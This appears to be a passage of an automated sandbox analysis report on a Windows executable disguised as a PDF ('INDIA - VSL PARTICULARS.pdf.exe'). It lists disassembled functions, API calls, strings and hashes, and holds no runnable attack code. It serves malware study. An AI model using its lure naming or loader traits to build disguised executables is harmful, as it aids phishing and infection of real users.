                              control_flow_graph 2131 40e4c0-40e4e5 call 403350 RegOpenKeyExW 2134 427190-4271ae RegQueryValueExW 2131->2134 2135 40e4eb-40e4f0 2131->2135 2136 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 2134->2136 2137 42721a-42722a RegCloseKey 2134->2137 2142 427210-427219 call 436508 2136->2142 2143 4271f7-42720e call 402160 2136->2143 2142->2137 2143->2142
                              APIs
                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                              • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: QueryValue$CloseOpen
                              • String ID: Include$Software\AutoIt v3\AutoIt
                              • API String ID: 1586453840-614718249
                              • Opcode ID: 89069ff54290d95ffeb0e4b83fb23c072447fe8f5d078393e68a3dec861a8096
                              • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                              • Opcode Fuzzy Hash: 89069ff54290d95ffeb0e4b83fb23c072447fe8f5d078393e68a3dec861a8096
                              • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                              Function 00410570 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                              Download Yara Rule
                              APIs
                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                              • ShowWindow.USER32(?,00000000), ref: 004105E4
                              • ShowWindow.USER32(?,00000000), ref: 004105EE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Window$CreateShow
                              • String ID: AutoIt v3$edit
                              • API String ID: 1584632944-3779509399
                              • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                              • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                              • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                              • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                              Function 00401B80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91windowCOMMON
                              Download Yara Rule
                              APIs
                              • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              • _wcsncpy.LIBCMT ref: 00401C41
                              • _wcscpy.LIBCMT ref: 00401C5D
                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                              • String ID: Line:
                              • API String ID: 1874344091-1585850449
                              • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                              • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                              • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                              • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                              Function 0040F250 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                              • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                              • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                              • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Close$OpenQueryValue
                              • String ID: Control Panel\Mouse
                              • API String ID: 1607946009-824357125
                              • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                              • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                              • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                              • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                              Function 00475077 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 390COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID:
                              • String ID: #v
                              • API String ID: 0-554117064
                              • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                              • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                              • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                              • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                              Function 03F1F878 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 163fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 03F1F768: Sleep.KERNELBASE(000001F4), ref: 03F1F779
                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03F1F9CE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2191192531.0000000003F1D000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F1D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_3f1d000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CreateFileSleep
                              • String ID: R8OJXRICD5G6CY5B477QDWTMP7C
                              • API String ID: 2694422964-218949812
                              • Opcode ID: ba3483c7acc50c8a65122e84a31b9251bda3a721f157ce0620c98c5d2828ef56
                              • Instruction ID: 09a708a3e34b074ea20d8c0acc83a2fbb653479c043ab43114b1d0b44abefb73
                              • Opcode Fuzzy Hash: ba3483c7acc50c8a65122e84a31b9251bda3a721f157ce0620c98c5d2828ef56
                              • Instruction Fuzzy Hash: 1361B431D04388DAEF11DBB4D844BEEBBB9AF19304F044199E248BB2C1D7B90B49CB65
                              Function 00475300 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                              • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Process$CurrentTerminate
                              • String ID: #v
                              • API String ID: 2429186680-554117064
                              • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                              • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                              • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                              • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                              Function 0040F570 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 247COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                              • _free.LIBCMT ref: 004295A0
                                • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                              • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe
                              • API String ID: 3938964917-398759878
                              • Opcode ID: 9e552fd7923e986f2723e425eb34f406980c652e500e15cac68f830d5ee71b03
                              • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                              • Opcode Fuzzy Hash: 9e552fd7923e986f2723e425eb34f406980c652e500e15cac68f830d5ee71b03
                              • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                              Function 0040BD80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: Error:
                              • API String ID: 4104443479-232661952
                              • Opcode ID: 0f3a33fb7be69c8e6baf3b23b87111ea2728d16161c2c78c6bada8bccab6f67e
                              • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                              • Opcode Fuzzy Hash: 0f3a33fb7be69c8e6baf3b23b87111ea2728d16161c2c78c6bada8bccab6f67e
                              • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                              Function 0040F520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
                              Download Yara Rule
                              APIs
                              • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe,0040F545,C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe,004A90E8,C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe,?,0040F545), ref: 0041013C
                                • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                              • String ID: X$pWH
                              • API String ID: 85490731-941433119
                              • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                              • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                              • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                              • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                              Function 03F1E4C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateProcessW.KERNELBASE(?,00000000), ref: 03F1E50D
                              • ExitProcess.KERNEL32(00000000), ref: 03F1E52C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2191192531.0000000003F1D000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F1D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_3f1d000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Process$CreateExit
                              • String ID: D
                              • API String ID: 126409537-2746444292
                              • Opcode ID: 359d21864460d0aa6716f03c0fb9f93045a71ab212c145842ddc1246808d9d7c
                              • Instruction ID: 2ee268bf847db4fd1eb15a49fdbe85edc04d6f773497a2143467970779f6de50
                              • Opcode Fuzzy Hash: 359d21864460d0aa6716f03c0fb9f93045a71ab212c145842ddc1246808d9d7c
                              • Instruction Fuzzy Hash: C1F0FF7694024CABDB60EFE4DC49FEE777CBF04701F448508FB0ADA184EA7896188B61
                              Function 00401B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                              Download Yara Rule
                              APIs
                              • _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • _memmove.LIBCMT ref: 00401B57
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                              • String ID: @EXITCODE
                              • API String ID: 2734553683-3436989551
                              • Opcode ID: d09de110ff079f104ffdf991df362542016b83ce61c8771042b9fd4bbac4f926
                              • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                              • Opcode Fuzzy Hash: d09de110ff079f104ffdf991df362542016b83ce61c8771042b9fd4bbac4f926
                              • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                              Function 00410100 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                              Download Yara Rule
                              Strings
                              • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                              • C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe, xrefs: 00410107
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _strcat
                              • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe
                              • API String ID: 1765576173-3330988521
                              • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                              • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                              • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                              • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                              Function 00414ABA Relevance: 4.7, APIs: 3, Instructions: 160COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __filbuf__getptd_noexit__read_memcpy_s
                              • String ID:
                              • API String ID: 1794320848-0
                              • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                              • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                              • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                              • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                              Function 0040E0C0 Relevance: 4.6, APIs: 3, Instructions: 82windowCOMMON
                              Download Yara Rule
                              APIs
                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: IconNotifyShell_
                              • String ID:
                              • API String ID: 1144537725-0
                              • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                              • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                              • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                              • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                              Function 0043213D Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                              Download Yara Rule
                              APIs
                              • _malloc.LIBCMT ref: 0043214B
                                • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
